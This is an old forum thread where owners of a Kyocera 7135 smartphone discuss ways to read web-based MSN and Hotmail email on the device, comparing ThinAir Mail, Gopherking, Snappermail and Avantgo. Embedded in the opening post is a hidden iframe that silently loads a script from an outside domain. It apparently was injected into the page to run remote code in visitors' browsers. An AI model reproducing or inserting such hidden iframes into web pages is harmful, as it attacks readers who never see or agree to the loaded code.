+ Reply to Thread
Page 1 of 2 1 2 LastLast

Getting Web-based .msn email on 7135

Does anyone know how I'd get web-based .msn email (ie, not pop 3) on the 7135?

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    you mean hotmail?

msn uses pop3, but they use script on their services. Xiino is one god browser that can handle some script but gopherking does a great job of grabbing msn mail...

I got the EN. called Verizen (data) they gave me an airbridge.net E-mail address and set me up to get the e-mail.so I am getting a massage alart to my phone stating that I have an e-mail.then I amg loging to edora mail and get my e-mail full text not only 160 car.THis way I dont need my alfa nomeric bepper any more.working great.only if you are roming it not but when you go back to your area you get all of them.

Thanks, Shtekler - but how do you get your web-based .msn email forwarded to Airbridge?

Hi sory for the late responed.
    call 1-866-890-2357 ask for verizon tech they can hepl you.

Thin Air Mail PQA lets me check hotmail nicely. See attached...
    Attached Files
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Originally posted by larryganz
    Thin Air Mail PQA lets me check hotmail nicely. See attached...
    Does ThinAir Work again with Hotmail? Last I checked it out it does not work anymore with Hotmail.

Dagi

Well, I haven't tried it in 6 weeks, but it worked then... And msn and hotmail should be on the same system now since both are webmail based now, right?
    Larry Ganz

Administrator
    msn still is pop3 as i get it in my outlook. but you can set it up for web based... thats been available for msn mail for quite some time..

Yeah...but how about Hotmail...it's not pop3 there...
    But I just tried it. ThinAir does pull Hotmail and the setup is very easy. The only problem I have that I only get the first 10 messages. The ThinAir FAQ tells me that there is a 'View next messages' available if you have more messages. But guess what. It's not there.

So all I can read is the first 10 messages...

Any idea?

Dagi

Administrator
    i have had no good experiences with thin air in the past so i left it alone and went for gopherking.

Success!

This may sound circuitous but it works for me. I have my web-based email forwarded to Gopherking Redirect which redirects it to airbridge which my 7135 then picks up through Snappermail (www.snappermail.com).

The nice thing about SM is that it pushes email to the PDA just like a Blackberry - you can specify the intervals.

With thin air mail, I have to delete one of the first ten messages to get to #11, etc... Delete all 10 and you see #11 - 20 in their place. This works fine if the hotmail email get's forwarded from or to another mailbox where you have a backup of what you delete.

Larry
    Larry Ganz

Getting to Hotmail

Can anyone explain to me why I can ONLY access my .msn mail at Hotmail using the EudoraWeb browser on my 7135 but cannot do it using the same url with Blazer or EIS?

Thanks!

Which URL are you using on Eudora web?

Dagi

URL

Here it is, Dagi:

msn.com/cgi-bin/HoTMaiL?curmbox=F000000001&a=8c7c7758f27b9dec5349787a3ddeec77

But any browser other than Eudora web won't even go to www.hotmail.com - that's what's strange.

As far as I know it has something to do with SSL in browsers. If they are not capable to use SSL and scripts you can't get to it.

I use the Verizon browser and get to it with the VZW with MSN setting. And funny as it is, I could never get to it with the Eudora browser.

Try vzw.msn.com and see if that get's you there. If I remember correctly you have to sign in with your hotmail ID and then you can use all the different things they offer there.

Dagi

Argghhh!

Thanks, Dagi - got close but no cigar....

Was able to get to vzw.msn and signed in with .msn email ID and PW but once in, there was no was to access Hotmail from within vzw.msn. So frustrating...

I am assuming you need graphics since Eudoraweb does not suffice. Try Avantgo. It is a little tricky. You must not use http://www.hotmail.com because Avantgo doesn't want you to access it for free. You can get to it by using the url you got from Eudoraweb after logging on. You'll have to log on again though and remember to check the "remain logged on" button.

Subsequent log ons will allow you to get to your mail. If you want to save it as a bookmark, create a eVmO channel on Avantgo and add the link to the bookmarks page there.

That worked for me.

I have a very simple and straightforward goal that I posted in a different thread as well. I do not want all my work email going to my 7135 and couldn't get it anyway because of my company's IT protocol.

Instead, I expect to get only a smattering of emails when I'm on the road. I'd like to set up an account somewhere so that I can tell my assistant when Im on the road to email me documents or schedule changes there.

Since I don't expect to get many messages, it seems wasteful and unnecessary to activate some sort of fetch feature. Instead, in my ideal world, I'd like the email to go to this account AND shoot me the first 160 characters or so using a text message so that I can decide whether to go retrive the whole thing - plus any documents - by proactively dialing in.

It is not clear whether Yahoo mail will both forward my mail as well as save a copy on its server for later retrieval. Do other ISP or web-based email providers do this? Would an airbridge (?) acount mentioned earlier take care of this?